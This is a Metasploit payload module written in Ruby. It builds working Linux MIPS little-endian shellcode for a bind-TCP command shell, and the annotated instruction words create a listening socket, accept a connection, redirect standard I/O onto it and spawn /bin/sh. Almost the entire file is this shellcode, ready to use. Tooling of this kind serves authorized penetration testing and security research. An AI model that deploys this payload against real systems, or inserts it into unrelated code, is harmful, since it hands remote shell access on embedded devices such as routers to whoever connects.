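##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Linux MIPS little-endian inline bind-TCP command shell payload.
#
# The shellcode built in #generate creates a TCP socket, binds it to
# INADDR_ANY on LPORT, listens, accepts a single connection, dup2()s the
# accepted socket onto file descriptors 2, 1 and 0, and execve()s
# "//bin/sh" so the shell talks directly over that socket.
module MetasploitModule
  # Length in bytes of the payload produced by #generate: the 58 four-byte
  # instruction words below. Must be updated whenever the shellcode changes.
  CachedSize = 232

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Registers the payload's metadata with the framework.
  #
  # @param info [Hash] module info supplied by the framework; merged with the
  #   static description below via merge_info
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Command Shell, Bind TCP Inline',
        'Description' => 'Listen for a connection and spawn a command shell',
        'Author' => [
          'scut', # Original mips-irix-portshell shellcode
          'vaicebine', # Original shellcode mod
          'Vlatko Kosturjak', # Metasploit module
          'juan vazquez' # Small fixes and optimizations
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_MIPSLE,
        'Handler' => Msf::Handler::BindTcp,
        'Session' => Msf::Sessions::CommandShellUnix,
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
  end

  # Builds the bind-shell shellcode for the configured LPORT.
  #
  # @param _opts [Hash] generation options, forwarded unchanged to +super+
  # @return [String] whatever +super+ returns followed by the 232-byte
  #   shellcode; when LPORT is not set only the +super+ result is returned
  # @raise [ArgumentError] if LPORT is not an integer within 0..65535. The
  #   port is emitted as a 16-bit immediate, so an out-of-range value would
  #   otherwise be silently truncated by pack('n') and the payload would
  #   listen on a different port than the one the handler expects.
  def generate(_opts = {})
    return super unless datastore['LPORT']

    port = Integer(datastore['LPORT'])
    unless (0..65535).cover?(port)
      raise ArgumentError, "LPORT must be within 0..65535, got #{port}"
    end

    # Port in network byte order. These two bytes form the low half of the
    # `li t5` instruction word below; after `sllv`/`or`/`sw` they end up as
    # the sin_port field of the sockaddr_in assembled on the stack at sp-32.
    port_bytes = [port].pack('n')

    shellcode =
      # socket(AF_INET=2, SOCK_STREAM=2, 0); result saved in s0
      "\xe0\xff\xbd\x27" + # addiu sp,sp,-32
      "\xfd\xff\x0e\x24" + # li t6,-3
      "\x27\x20\xc0\x01" + # nor a0,t6,zero
      "\x27\x28\xc0\x01" + # nor a1,t6,zero
      "\xff\xff\x06\x28" + # slti a2,zero,-1
      "\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket )
      "\x0c\x01\x01\x01" + # syscall
      "\xff\xff\x50\x30" + # andi s0,v0,0xffff
      # build sockaddr_in { sin_family=2, sin_port=LPORT, sin_addr=0 } at sp-32
      "\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef
      "\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16)
      port_bytes + "\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 4444 (default LPORT))
      "\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c110000
      "\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -3
      "\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x2
      "\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c110002
      "\xe0\xff\xad\xaf" + # sw t5,-32(sp)
      "\xe4\xff\xa0\xaf" + # sw zero,-28(sp)
      "\xe8\xff\xa0\xaf" + # sw zero,-24(sp)
      "\xec\xff\xa0\xaf" + # sw zero,-20(sp)
      # bind(s0, sp-32, 16)
      "\x25\x20\x10\x02" + # or a0,s0,s0
      "\xef\xff\x0e\x24" + # li t6,-17
      "\x27\x30\xc0\x01" + # nor a2,t6,zero
      "\xe0\xff\xa5\x23" + # addi a1,sp,-32
      "\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )
      "\x0c\x01\x01\x01" + # syscall
      # listen(s0, 257)
      "\x25\x20\x10\x02" + # or a0,s0,s0
      "\x01\x01\x05\x24" + # li a1,257
      "\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen )
      "\x0c\x01\x01\x01" + # syscall
      # accept(s0, NULL, NULL); the client socket is stored at sp-1
      "\x25\x20\x10\x02" + # or a0,s0,s0
      "\xff\xff\x05\x28" + # slti a1,zero,-1
      "\xff\xff\x06\x28" + # slti a2,zero,-1
      "\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept )
      "\x0c\x01\x01\x01" + # syscall
      "\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket
      # dup2(client, fd) for fd = 2, 1, 0
      "\xfd\xff\x11\x24" + # li s1,-3
      "\x27\x88\x20\x02" + # nor s1,s1,zero
      "\xff\xff\xa4\x8f" + # lw a0,-1(sp)
      "\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
      "\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 )
      "\x0c\x01\x01\x01" + # syscall 0x40404
      "\xff\xff\x10\x24" + # li s0,-1
      "\xff\xff\x31\x22" + # addi s1,s1,-1
      "\xfa\xff\x30\x16" + # bne s1,s0 <dup2_loop>
      "\xff\xff\x06\x28" + # slti a2,zero,-1
      # execve("//bin/sh", [sp-20, NULL], NULL); the path is written at sp-20
      "\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"
      "\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"
      "\xec\xff\xaf\xaf" + # sw t7,-20(sp)
      "\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"
      "\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"
      "\xf0\xff\xae\xaf" + # sw t6,-16(sp)
      "\xf4\xff\xa0\xaf" + # sw zero,-12(sp)
      "\xec\xff\xa4\x27" + # addiu a0,sp,-20
      "\xf8\xff\xa4\xaf" + # sw a0,-8(sp)
      "\xfc\xff\xa0\xaf" + # sw zero,-4(sp)
      "\xf8\xff\xa5\x27" + # addiu a1,sp,-8
      "\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve )
      "\x0c\x01\x01\x01" # syscall 0x40404

    super + shellcode
  end
end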